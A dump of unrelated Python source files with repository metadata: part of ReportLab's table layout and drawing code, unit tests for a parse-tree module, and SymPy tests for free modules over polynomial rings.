def _calcNoSplitRanges(self):
"""
This creates some mappings to let the later code determine
if a cell is part of a "nosplit" range.
self._nosplitRanges shows the 'coords' in integers of each
'cell range', or None if it was clobbered:
(col, row) -> (col0, row0, col1, row1)
Any cell not in the key is not part of a spanned region
"""
self._nosplitRanges = nosplitRanges = {}
for x in range(self._ncols):
for y in range(self._nrows):
nosplitRanges[x,y] = (x, y, x, y)
self._colNoSplitCells = []
self._rowNoSplitCells = []
csa = self._colNoSplitCells.append
rsa = self._rowNoSplitCells.append
for (cmd, start, stop) in self._nosplitCmds:
x0, y0 = start
x1, y1 = stop
#normalize
if x0 < 0: x0 = x0 + self._ncols
if x1 < 0: x1 = x1 + self._ncols
if y0 < 0: y0 = y0 + self._nrows
if y1 < 0: y1 = y1 + self._nrows
if x0 > x1: x0, x1 = x1, x0
if y0 > y1: y0, y1 = y1, y0
if x0!=x1 or y0!=y1:
#column span
if x0!=x1:
for y in range(y0, y1+1):
for x in range(x0,x1+1):
csa((x,y))
#row span
if y0!=y1:
for y in range(y0, y1+1):
for x in range(x0,x1+1):
rsa((x,y))
for y in range(y0, y1+1):
for x in range(x0,x1+1):
nosplitRanges[x,y] = None
# set the main entry
nosplitRanges[x0,y0] = (x0, y0, x1, y1)
def _calcSpanRects(self):
"""Work out rects for tables which do row and column spanning.
Based on self._spanRanges, which is already known,
and the widths which were given or previously calculated,
self._spanRects shows the real coords for drawing:
(col, row) -> (x, y, width, height)
for each cell. Any cell which 'does not exist' as another
has spanned over it will get a None entry on the right
"""
spanRects = getattr(self,'_spanRects',{})
hmax = getattr(self,'_hmax',None)
longTable = self._longTableOptimize
if spanRects and (longTable and hmax==self._hmax_spanRects or not longTable):
return
colpositions = self._colpositions
rowpositions = self._rowpositions
vBlocks = {}
hBlocks = {}
rlim = len(rowpositions)-1
for (coord, value) in self._spanRanges.items():
if value is None:
spanRects[coord] = None
else:
col0, row0, col1, row1 = value
if row1>=rlim: continue
col,row = coord
if col1-col0>0:
for _ in range(col0+1,col1+1):
vBlocks.setdefault(colpositions[_],[]).append((rowpositions[row1+1],rowpositions[row0]))
if row1-row0>0:
for _ in range(row0+1,row1+1):
hBlocks.setdefault(rowpositions[_],[]).append((colpositions[col0],colpositions[col1+1]))
x = colpositions[col0]
y = rowpositions[row1+1]
width = colpositions[col1+1] - x
height = rowpositions[row0] - y
spanRects[coord] = (x, y, width, height)
for _ in hBlocks, vBlocks:
for value in _.values():
value.sort()
self._spanRects = spanRects
self._vBlocks = vBlocks
self._hBlocks = hBlocks
self._hmax_spanRects = hmax
def setStyle(self, tblstyle):
if not isinstance(tblstyle,TableStyle):
tblstyle = TableStyle(tblstyle)
for cmd in tblstyle.getCommands():
self._addCommand(cmd)
for k,v in tblstyle._opts.items():
setattr(self,k,v)
for a in ('spaceBefore','spaceAfter'):
if not hasattr(self,a) and hasattr(tblstyle,a):
setattr(self,a,getattr(tblstyle,a))
def _addCommand(self,cmd):
if cmd[0] in ('BACKGROUND','ROWBACKGROUNDS','COLBACKGROUNDS'):
self._bkgrndcmds.append(cmd)
elif cmd[0] == 'SPAN':
self._spanCmds.append(cmd)
elif cmd[0] == 'NOSPLIT':
# we expect op, start, stop
self._nosplitCmds.append(cmd)
elif _isLineCommand(cmd):
# we expect op, start, stop, weight, colour, cap, dashes, join
cmd = list(cmd)
if len(cmd)<5: raise ValueError('bad line command '+ascii(cmd))
#determine line cap value at position 5. This can be str or numeric.
if len(cmd)<6:
cmd.append(1)
else:
cap = _convert2int(cmd[5], LINECAPS, 0, 2, 'cap', cmd)
cmd[5] = cap
#dashes at index 6 - this is a dash array:
if len(cmd)<7: cmd.append(None)
#join mode at index 7 - can be str or numeric, look up as for caps
if len(cmd)<8: cmd.append(1)
else:
join = _convert2int(cmd[7], LINEJOINS, 0, 2, 'join', cmd)
cmd[7] = join
#linecount at index 8. Default is 1, set to 2 for double line.
if len(cmd)<9: cmd.append(1)
else:
lineCount = cmd[8]
if lineCount is None:
lineCount = 1
cmd[8] = lineCount
assert lineCount >= 1
#linespacing at index 9. Not applicable unless 2+ lines, defaults to line
#width so you get a visible gap between centres
if len(cmd)<10: cmd.append(cmd[3])
else:
space = cmd[9]
if space is None:
space = cmd[3]
cmd[9] = space
assert len(cmd) == 10
self._linecmds.append(tuple(cmd))
else:
(op, (sc, sr), (ec, er)), values = cmd[:3] , cmd[3:]
if sc < 0: sc = sc + self._ncols
if ec < 0: ec = ec + self._ncols
if sr < 0: sr = sr + self._nrows
if er < 0: er = er + self._nrows
for i in range(sr, er+1):
for j in range(sc, ec+1):
_setCellStyle(self._cellStyles, i, j, op, values)
def _drawLines(self):
ccap, cdash, cjoin = None, None, None
self.canv.saveState()
for op, (sc,sr), (ec,er), weight, color, cap, dash, join, count, space in self._linecmds:
if isinstance(sr,strTypes) and sr.startswith('split'): continue
if sc < 0: sc = sc + self._ncols
if ec < 0: ec = ec + self._ncols
if sr < 0: sr = sr + self._nrows
if er < 0: er = er + self._nrows
if cap!=None and ccap!=cap:
self.canv.setLineCap(cap)
ccap = cap
if dash is None or dash == []:
if cdash is not None:
self.canv.setDash()
cdash = None
elif dash != cdash:
self.canv.setDash(dash)
cdash = dash
if join is not None and cjoin!=join:
self.canv.setLineJoin(join)
cjoin = join
getattr(self,_LineOpMap.get(op, '_drawUnknown' ))( (sc, sr), (ec, er), weight, color, count, space)
self.canv.restoreState()
self._curcolor = None
def _drawUnknown(self, start, end, weight, color, count, space):
#we are only called from _drawLines which is one level up
import sys
op = sys._getframe(1).f_locals['op']
raise ValueError("Unknown line command '%s'" % op)
def _drawGrid(self, start, end, weight, color, count, space):
self._drawBox( start, end, weight, color, count, space)
self._drawInnerGrid( start, end, weight, color, count, space)
def _drawBox(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
self._drawHLines((sc, sr), (ec, sr), weight, color, count, space)
self._drawHLines((sc, er+1), (ec, er+1), weight, color, count, space)
self._drawVLines((sc, sr), (sc, er), weight, color, count, space)
self._drawVLines((ec+1, sr), (ec+1, er), weight, color, count, space)
def _drawInnerGrid(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
self._drawHLines((sc, sr+1), (ec, er), weight, color, count, space)
self._drawVLines((sc+1, sr), (ec, er), weight, color, count, space)
def _prepLine(self, weight, color):
if color != self._curcolor:
self.canv.setStrokeColor(color)
self._curcolor = color
if weight != self._curweight:
self.canv.setLineWidth(weight)
self._curweight = weight
def _drawHLines(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
ecp = self._colpositions[sc:ec+2]
rp = self._rowpositions[sr:er+1]
if len(ecp)<=1 or len(rp)<1: return
self._prepLine(weight, color)
scp = ecp[0]
ecp = ecp[-1]
hBlocks = getattr(self,'_hBlocks',{})
canvLine = self.canv.line
if count == 1:
for y in rp:
_hLine(canvLine, scp, ecp, y, hBlocks)
else:
lf = lambda x0,y0,x1,y1,canvLine=canvLine, ws=weight+space, count=count: _multiLine(x0,x1,y0,canvLine,ws,count)
for y in rp:
_hLine(lf, scp, ecp, y, hBlocks)
def _drawHLinesB(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
self._drawHLines((sc, sr+1), (ec, er+1), weight, color, count, space)
def _drawVLines(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
erp = self._rowpositions[sr:er+2]
cp = self._colpositions[sc:ec+1]
if len(erp)<=1 or len(cp)<1: return
self._prepLine(weight, color)
srp = erp[0]
erp = erp[-1]
vBlocks = getattr(self,'_vBlocks',{})
canvLine = lambda y0, x0, y1, x1, _line=self.canv.line: _line(x0,y0,x1,y1)
if count == 1:
for x in cp:
_hLine(canvLine, erp, srp, x, vBlocks)
else:
lf = lambda x0,y0,x1,y1,canvLine=canvLine, ws=weight+space, count=count: _multiLine(x0,x1,y0,canvLine,ws,count)
for x in cp:
_hLine(lf, erp, srp, x, vBlocks)
def _drawVLinesA(self, start, end, weight, color, count, space):
sc,sr = start
ec,er = end
self._drawVLines((sc+1, sr), (ec+1, er), weight, color, count, space)
def wrap(self, availWidth, availHeight):
self._calc(availWidth, availHeight)
self.availWidth = availWidth
return (self._width, self._height)
def onSplit(self,T,byRow=1):
'''
This method will be called when the Table is split.
Special purpose tables can override to do special stuff.
'''
pass
def _cr_0(self,n,cmds):
for c in cmds:
c = tuple(c)
(sc,sr), (ec,er) = c[1:3]
if isinstance(sr,strTypes) or sr>=n: continue
if er>=n: er = n-1
self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _cr_1_1(self,n,repeatRows, cmds):
for c in cmds:
c = tuple(c)
(sc,sr), (ec,er) = c[1:3]
if sr in ('splitfirst','splitlast'): self._addCommand(c)
else:
if sr>=0 and sr>=repeatRows and sr<n and er>=0 and er<n: continue
if sr>=repeatRows and sr<n: sr=repeatRows
elif sr>=repeatRows and sr>=n: sr=sr+repeatRows-n
if er>=repeatRows and er<n: er=repeatRows
elif er>=repeatRows and er>=n: er=er+repeatRows-n
self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _cr_1_0(self,n,cmds):
for c in cmds:
c = tuple(c)
(sc,sr), (ec,er) = c[1:3]
if sr in ('splitfirst','splitlast'): self._addCommand(c)
else:
if er>=0 and er<n: continue
if sr>=0 and sr<n: sr=0
if sr>=n: sr = sr-n
if er>=n: er = er-n
self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _splitRows(self,availHeight):
n=self._getFirstPossibleSplitRowPosition(availHeight)
if n<=self.repeatRows: return []
lim = len(self._rowHeights)
if n==lim: return [self]
repeatRows = self.repeatRows
repeatCols = self.repeatCols
splitByRow = self.splitByRow
data = self._cellvalues
#we're going to split into two superRows
ident = self.ident
if ident: ident = IdentStr(ident)
R0 = self.__class__( data[:n], colWidths=self._colWidths, rowHeights=self._argH[:n],
repeatRows=repeatRows, repeatCols=repeatCols,
splitByRow=splitByRow, normalizedData=1, cellStyles=self._cellStyles[:n],
ident=ident)
#copy the commands
A = []
# hack up the line commands
for op, (sc,sr), (ec,er), weight, color, cap, dash, join, count, space in self._linecmds:
if isinstance(sr,strTypes) and sr.startswith('split'):
A.append((op,(sc,sr), (ec,sr), weight, color, cap, dash, join, count, space))
if sr=='splitlast':
sr = er = n-1
elif sr=='splitfirst':
sr = n
er = n
if sc < 0: sc = sc + self._ncols
if ec < 0: ec = ec + self._ncols
if sr < 0: sr = sr + self._nrows
if er < 0: er = er + self._nrows
if op in ('BOX','OUTLINE','GRID'):
if sr<n and er>=n:
# we have to split the BOX
A.append(('LINEABOVE',(sc,sr), (ec,sr), weight, color, cap, dash, join, count, space))
A.append(('LINEBEFORE',(sc,sr), (sc,er), weight, color, cap, dash, join, count, space))
A.append(('LINEAFTER',(ec,sr), (ec,er), weight, color, cap, dash, join, count, space))
A.append(('LINEBELOW',(sc,er), (ec,er), weight, color, cap, dash, join, count, space))
if op=='GRID':
A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
A.append(('LINEABOVE',(sc,n), (ec,n), weight, color, cap, dash, join, count, space))
A.append(('INNERGRID',(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
else:
A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
elif op in ('INNERGRID','LINEABOVE'):
if sr<n and er>=n:
A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
A.append(('LINEABOVE',(sc,n), (ec,n), weight, color, cap, dash, join, count, space))
A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
elif op == 'LINEBELOW':
if sr<n and er>=(n-1):
A.append(('LINEABOVE',(sc,n), (ec,n), weight, color, cap, dash, join, count, space))
A.append((op,(sc,sr), (ec,er), weight, color))
elif op == 'LINEABOVE':
if sr<=n and er>=n:
A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
else:
A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
R0._cr_0(n,A)
R0._cr_0(n,self._bkgrndcmds)
R0._cr_0(n,self._spanCmds)
R0._cr_0(n,self._nosplitCmds)
if ident: ident = IdentStr(ident)
if repeatRows:
#R1 = slelf.__class__(data[:repeatRows]+data[n:],self._argW,
R1 = self.__class__(data[:repeatRows]+data[n:],colWidths=self._colWidths,
rowHeights=self._argH[:repeatRows]+self._argH[n:],
repeatRows=repeatRows, repeatCols=repeatCols,
splitByRow=splitByRow, normalizedData=1,
cellStyles=self._cellStyles[:repeatRows]+self._cellStyles[n:],
ident=ident,
)
R1._cr_1_1(n,repeatRows,A)
R1._cr_1_1(n,repeatRows,self._bkgrndcmds)
R1._cr_1_1(n,repeatRows,self._spanCmds)
R1._cr_1_1(n,repeatRows,self._nosplitCmds)
else:
#R1 = slelf.__class__(data[n:], self._argW, self._argH[n:],
R1 = self.__class__(data[n:], colWidths=self._colWidths, rowHeights=self._argH[n:],
repeatRows=repeatRows, repeatCols=repeatCols,
splitByRow=splitByRow, normalizedData=1, cellStyles=self._cellStyles[n:],
ident=ident,
)
R1._cr_1_0(n,A)
R1._cr_1_0(n,self._bkgrndcmds)
R1._cr_1_0(n,self._spanCmds)
R1._cr_1_0(n,self._nosplitCmds)
R0.hAlign = R1.hAlign = self.hAlign
R0.vAlign = R1.vAlign = self.vAlign
self.onSplit(R0)
self.onSplit(R1)
return [R0,R1]
def _getRowImpossible(impossible,cells,ranges):
for xy in cells:
r=ranges[xy]
if r!=None:
y1,y2=r[1],r[3]
if y1!=y2:
ymin=min(y1,y2) #normalize
ymax=max(y1,y2) #normalize
y=ymin+1
while 1:
if y>ymax: break
impossible[y]=None #split at position y is impossible because of overlapping rowspan
y+=1
_getRowImpossible=staticmethod(_getRowImpossible)
def _getFirstPossibleSplitRowPosition(self,availHeight):
impossible={}
if self._spanCmds:
self._getRowImpossible(impossible,self._rowSpanCells,self._spanRanges)
if self._nosplitCmds:
self._getRowImpossible(impossible,self._rowNoSplitCells,self._nosplitRanges)
h = 0
n = 1
split_at = 0 # from this point of view 0 is the first position where the table may *always* be splitted
for rh in self._rowHeights:
if h+rh>availHeight:
break
if n not in impossible:
split_at=n
h=h+rh
n=n+1
return split_at
def split(self, availWidth, availHeight):
self._calc(availWidth, availHeight)
if self.splitByRow:
if not rl_config.allowTableBoundsErrors and self._width>availWidth: return []
return self._splitRows(availHeight)
else:
raise NotImplementedError
def draw(self):
self._curweight = self._curcolor = self._curcellstyle = None
self._drawBkgrnd()
if not self._spanCmds:
# old fashioned case, no spanning, steam on and do each cell
for row, rowstyle, rowpos, rowheight in zip(self._cellvalues, self._cellStyles, self._rowpositions[1:], self._rowHeights):
for cellval, cellstyle, colpos, colwidth in zip(row, rowstyle, self._colpositions[:-1], self._colWidths):
self._drawCell(cellval, cellstyle, (colpos, rowpos), (colwidth, rowheight))
else:
# we have some row or col spans, need a more complex algorithm
# to find the rect for each
for rowNo in range(self._nrows):
for colNo in range(self._ncols):
cellRect = self._spanRects[colNo, rowNo]
if cellRect is not None:
(x, y, width, height) = cellRect
cellval = self._cellvalues[rowNo][colNo]
cellstyle = self._cellStyles[rowNo][colNo]
self._drawCell(cellval, cellstyle, (x, y), (width, height))
self._drawLines()
def _drawBkgrnd(self):
nrows = self._nrows
ncols = self._ncols
canv = self.canv
colpositions = self._colpositions
rowpositions = self._rowpositions
rowHeights = self._rowHeights
colWidths = self._colWidths
spanRects = getattr(self,'_spanRects',None)
for cmd, (sc, sr), (ec, er), arg in self._bkgrndcmds:
if sc < 0: sc = sc + ncols
if ec < 0: ec = ec + ncols
if sr < 0: sr = sr + nrows
if er < 0: er = er + nrows
x0 = colpositions[sc]
y0 = rowpositions[sr]
x1 = colpositions[min(ec+1,ncols)]
y1 = rowpositions[min(er+1,nrows)]
w, h = x1-x0, y1-y0
if hasattr(arg,'__call__'):
arg(self,canv, x0, y0, w, h)
elif cmd == 'ROWBACKGROUNDS':
#Need a list of colors to cycle through. The arguments
#might be already colours, or convertible to colors, or
# None, or the str 'None'.
#It's very common to alternate a pale shade with None.
colorCycle = list(map(colors.toColorOrNone, arg))
count = len(colorCycle)
rowCount = er - sr + 1
for i in range(rowCount):
color = colorCycle[i%count]
h = rowHeights[sr + i]
if color:
canv.setFillColor(color)
canv.rect(x0, y0, w, -h, stroke=0,fill=1)
y0 = y0 - h
elif cmd == 'COLBACKGROUNDS':
#cycle through colours columnwise
colorCycle = list(map(colors.toColorOrNone, arg))
count = len(colorCycle)
colCount = ec - sc + 1
for i in range(colCount):
color = colorCycle[i%count]
w = colWidths[sc + i]
if color:
canv.setFillColor(color)
canv.rect(x0, y0, w, h, stroke=0,fill=1)
x0 = x0 +w
else: #cmd=='BACKGROUND'
color = colors.toColorOrNone(arg)
if color:
if ec==sc and er==sr and spanRects:
xywh = spanRects.get((sc,sr))
if xywh:
#it's a single cell
x0, y0, w, h = xywh
canv.setFillColor(color)
canv.rect(x0, y0, w, h, stroke=0,fill=1)
def _drawCell(self, cellval, cellstyle, pos, size):
colpos, rowpos = pos
colwidth, rowheight = size
if self._curcellstyle is not cellstyle:
cur = self._curcellstyle
if cur is None or cellstyle.color != cur.color:
self.canv.setFillColor(cellstyle.color)
if cur is None or cellstyle.leading != cur.leading or cellstyle.fontname != cur.fontname or cellstyle.fontsize != cur.fontsize:
self.canv.setFont(cellstyle.fontname, cellstyle.fontsize, cellstyle.leading)
self._curcellstyle = cellstyle
just = cellstyle.alignment
valign = cellstyle.valign
if isinstance(cellval,(tuple,list,Flowable)):
if not isinstance(cellval,(tuple,list)): cellval = (cellval,)
# we assume it's a list of Flowables
W = []
H = []
w, h = self._listCellGeom(cellval,colwidth,cellstyle,W=W, H=H,aH=rowheight)
if valign=='TOP':
y = rowpos + rowheight - cellstyle.topPadding
elif valign=='BOTTOM':
y = rowpos+cellstyle.bottomPadding + h
else:
y = rowpos+(rowheight+cellstyle.bottomPadding-cellstyle.topPadding+h)/2.0
if cellval: y += cellval[0].getSpaceBefore()
for v, w, h in zip(cellval,W,H):
if just=='LEFT': x = colpos+cellstyle.leftPadding
elif just=='RIGHT': x = colpos+colwidth-cellstyle.rightPadding - w
elif just in ('CENTRE', 'CENTER'):
x = colpos+(colwidth+cellstyle.leftPadding-cellstyle.rightPadding-w)/2.0
else:
raise ValueError('Invalid justification %s' % just)
y -= v.getSpaceBefore()
y -= h
v.drawOn(self.canv,x,y)
y -= v.getSpaceAfter()
else:
if just == 'LEFT':
draw = self.canv.drawString
x = colpos + cellstyle.leftPadding
elif just in ('CENTRE', 'CENTER'):
draw = self.canv.drawCentredString
x = colpos+(colwidth+cellstyle.leftPadding-cellstyle.rightPadding)*0.5
elif just == 'RIGHT':
draw = self.canv.drawRightString
x = colpos + colwidth - cellstyle.rightPadding
elif just == 'DECIMAL':
draw = self.canv.drawAlignedString
x = colpos + colwidth - cellstyle.rightPadding
else:
raise ValueError('Invalid justification %s' % just)
vals = str(cellval).split("\n")
n = len(vals)
leading = cellstyle.leading
fontsize = cellstyle.fontsize
if valign=='BOTTOM':
y = rowpos + cellstyle.bottomPadding+n*leading-fontsize
elif valign=='TOP':
y = rowpos + rowheight - cellstyle.topPadding - fontsize
elif valign=='MIDDLE':
#tim roberts pointed out missing fontsize correction 2004-10-04
y = rowpos + (cellstyle.bottomPadding + rowheight-cellstyle.topPadding+n*leading)/2.0 - fontsize
else:
raise ValueError("Bad valign: '%s'" % str(valign))
for v in vals:
draw(x, y, v)
y -= leading
onDraw = getattr(cellval,'onDraw',None)
if onDraw:
onDraw(self.canv,cellval.kind,cellval.label)
if cellstyle.href:
#external hyperlink
self.canv.linkURL(cellstyle.href, (colpos, rowpos, colpos + colwidth, rowpos + rowheight), relative=1)
if cellstyle.destination:
#external hyperlink
self.canv.linkRect("", cellstyle.destination, Rect=(colpos, rowpos, colpos + colwidth, rowpos + rowheight), relative=1)
_LineOpMap = { 'GRID':'_drawGrid',
'BOX':'_drawBox',
'OUTLINE':'_drawBox',
'INNERGRID':'_drawInnerGrid',
'LINEBELOW':'_drawHLinesB',
'LINEABOVE':'_drawHLines',
'LINEBEFORE':'_drawVLines',
'LINEAFTER':'_drawVLinesA', }
class LongTable(Table):
'''Henning von Bargen's changes will be active'''
_longTableOptimize = 1
LINECOMMANDS = list(_LineOpMap.keys())
def _isLineCommand(cmd):
return cmd[0] in LINECOMMANDS
def _setCellStyle(cellStyles, i, j, op, values):
#new = CellStyle('<%d, %d>' % (i,j), cellStyles[i][j])
#cellStyles[i][j] = new
## modify in place!!!
new = cellStyles[i][j]
if op == 'FONT':
n = len(values)
new.fontname = values[0]
if n>1:
new.fontsize = values[1]
if n>2:
new.leading = values[2]
else:
new.leading = new.fontsize*1.2
elif op in ('FONTNAME', 'FACE'):
new.fontname = values[0]
elif op in ('SIZE', 'FONTSIZE'):
new.fontsize = values[0]
elif op == 'LEADING':
new.leading = values[0]
elif op == 'TEXTCOLOR':
new.color = colors.toColor(values[0], colors.Color(0,0,0))
elif op in ('ALIGN', 'ALIGNMENT'):
new.alignment = values[0]
elif op == 'VALIGN':
new.valign = values[0]
elif op == 'LEFTPADDING':
new.leftPadding = values[0]
elif op == 'RIGHTPADDING':
new.rightPadding = values[0]
elif op == 'TOPPADDING':
new.topPadding = values[0]
elif op == 'BOTTOMPADDING':
new.bottomPadding = values[0]
elif op == 'HREF':
new.href = values[0]
elif op == 'DESTINATION':
new.destination = values[0]
GRID_STYLE = TableStyle(
[('GRID', (0,0), (-1,-1), 0.25, colors.black),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
BOX_STYLE = TableStyle(
[('BOX', (0,0), (-1,-1), 0.50, colors.black),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
LABELED_GRID_STYLE = TableStyle(
[('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
('BOX', (0,0), (-1,-1), 2, colors.black),
('LINEBELOW', (0,0), (-1,0), 2, colors.black),
('LINEAFTER', (0,0), (0,-1), 2, colors.black),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
COLORED_GRID_STYLE = TableStyle(
[('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
('BOX', (0,0), (-1,-1), 2, colors.red),
('LINEBELOW', (0,0), (-1,0), 2, colors.black),
('LINEAFTER', (0,0), (0,-1), 2, colors.black),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
LIST_STYLE = TableStyle(
[('LINEABOVE', (0,0), (-1,0), 2, colors.green),
('LINEABOVE', (0,1), (-1,-1), 0.25, colors.black),
('LINEBELOW', (0,-1), (-1,-1), 2, colors.green),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
# experimental iterator which can apply a sequence
# of colors e.g. Blue, None, Blue, None as you move
# down.
if __name__ == '__main__':
from tests.test_platypus_tables import old_tables_test
old_tables_test()
| 41.034098
| 202
| 0.523101
|
4a0a2a16488fbcb23d6421199f8d56bd38298ee4
| 4,015
|
py
|
Python
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 6
|
2017-06-05T08:58:55.000Z
|
2020-11-22T13:49:34.000Z
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | null | null | null |
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 2
|
2017-04-24T08:19:06.000Z
|
2020-12-16T08:42:09.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The tests for tree implementation
@author: yaric
"""
import unittest
import tree_dict as td
import config
import utils
class TestDeepTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[1]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 125, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 82, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 28, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 13, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 11, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 3, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 3, "DPA Subtrees in the ROOT")
class TestShallowTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[723]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 33, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 19, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 2, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 4, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 4, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 1, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 0, "DPA Subtrees in the ROOT")
if __name__ == '__main__':
unittest.main()
| 32.12
| 84
| 0.596015
|
4a0a2ac4bf5a2b725453d1fcdc6482980c4016d7
| 12,988
|
py
|
Python
|
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
"""Test modules.py code."""
from sympy.polys.agca.modules import FreeModule, ModuleOrder, FreeModulePolyRing
from sympy.polys import CoercionFailed, QQ, lex, grlex, ilex, ZZ
from sympy.abc import x, y, z
from sympy.utilities.pytest import raises
from sympy import S
def test_FreeModuleElement():
M = QQ[x].free_module(3)
e = M.convert([1, x, x**2])
f = [QQ[x].convert(1), QQ[x].convert(x), QQ[x].convert(x**2)]
assert list(e) == f
assert f[0] == e[0]
assert f[1] == e[1]
assert f[2] == e[2]
raises(IndexError, lambda: e[3])
g = M.convert([x, 0, 0])
assert e + g == M.convert([x + 1, x, x**2])
assert f + g == M.convert([x + 1, x, x**2])
assert -e == M.convert([-1, -x, -x**2])
assert e - g == M.convert([1 - x, x, x**2])
assert e != g
assert M.convert([x, x, x]) / QQ[x].convert(x) == [1, 1, 1]
R = QQ.poly_ring(x, order="ilex")
assert R.free_module(1).convert([x]) / R.convert(x) == [1]
def test_FreeModule():
M1 = FreeModule(QQ[x], 2)
assert M1 == FreeModule(QQ[x], 2)
assert M1 != FreeModule(QQ[y], 2)
assert M1 != FreeModule(QQ[x], 3)
M2 = FreeModule(QQ.poly_ring(x, order="ilex"), 2)
assert [x, 1] in M1
assert [x] not in M1
assert [2, y] not in M1
assert [1/(x + 1), 2] not in M1
e = M1.convert([x, x**2 + 1])
X = QQ[x].convert(x)
assert e == [X, X**2 + 1]
assert e == [x, x**2 + 1]
assert 2*e == [2*x, 2*x**2 + 2]
assert e*2 == [2*x, 2*x**2 + 2]
assert e/2 == [x/2, (x**2 + 1)/2]
assert x*e == [x**2, x**3 + x]
assert e*x == [x**2, x**3 + x]
assert X*e == [x**2, x**3 + x]
assert e*X == [x**2, x**3 + x]
assert [x, 1] in M2
assert [x] not in M2
assert [2, y] not in M2
assert [1/(x + 1), 2] in M2
e = M2.convert([x, x**2 + 1])
X = QQ.poly_ring(x, order="ilex").convert(x)
assert e == [X, X**2 + 1]
assert e == [x, x**2 + 1]
assert 2*e == [2*x, 2*x**2 + 2]
assert e*2 == [2*x, 2*x**2 + 2]
assert e/2 == [x/2, (x**2 + 1)/2]
assert x*e == [x**2, x**3 + x]
assert e*x == [x**2, x**3 + x]
assert e/(1 + x) == [x/(1 + x), (x**2 + 1)/(1 + x)]
assert X*e == [x**2, x**3 + x]
